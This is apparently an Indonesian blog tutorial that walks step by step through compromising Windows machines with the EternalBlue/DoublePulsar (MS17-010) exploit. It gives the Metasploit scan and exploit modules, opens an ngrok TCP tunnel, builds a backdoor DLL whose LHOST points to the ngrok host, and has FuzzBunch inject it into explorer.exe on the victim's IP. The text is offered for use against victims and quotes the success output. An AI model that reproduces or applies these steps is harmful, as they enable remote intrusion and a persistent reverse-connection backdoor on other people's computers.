Exploit windows dengan eternalblue_doublepulsar & ngrok

Exploit windows dengan eternalblue_doublepulsar & ngrok.

Berhubung repositorynya backboxindonesia lagi bermasalah jdi saya buat alternativenya.

Download semua bahan2 dulu : https://github.com/black-hell/exploit

eternalblue_doublepulsar : https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 

Untuk penginstalan ngrok bisa ke sini : https://ngrok.com/

Dan untuk bisa menggunakan doublepulsar, anda harus menginstall wine.

 1. Cari target yg vuln SMB, untuk mengetahui apakah target vuln SMB bisa cek  dengan ms17_010, Jika target vuln maka akan seperti dibawah ini.

use auxiliary/scanner/smb/smb_ms17_010

2. Kalo sudah lanjut untuk exploit target dengan eternalblue_doublepulsar.

use exploit/windows/smb/eternalblue_doublepulsar

Jika backdoor sukses, mari lanjut ke tahap berikut :D

3. Lanjut dengan ngrok.

ngrok tcp 123

4.  Tahap pembuatan backdoor dengan pusdik. Atur pembuatan backdoor dengan ip dan port di ngrok, sedangkan untuk listenya port 123 sesuai dengan yg saya bikin.

[?] LHOST  : 0.tcp.ngrok.io
[?] LPORT  : 13588
[?] Listen (y/n) : y
[?] LPORT  : 123

  
jika sudah copykan file backdoor yg anda buat ke folder /tmp/.

cp win64.dll /tmp/

5. Next exploitasi win tsb, buka fuzzbunch yg sudah di download tdi.

fuzzbunch

 

Set TargetIp :(ipkorban), enter, set Architecture [1] :(x64/x86), enter, set Function : pilih nomor 2(RunDLL), enter, set DllPayload  : /tmp/win64.dll, enter, set ProcessName : explorer.exe.

6. JIka sudah, enter tunggu sampai tulisan

     DLL built
     Sending shellcode to inject DLL
     Backdoor returned code: 10 - Success!
     Command completed successfully

dan selesailah exploitasi windows tsb :v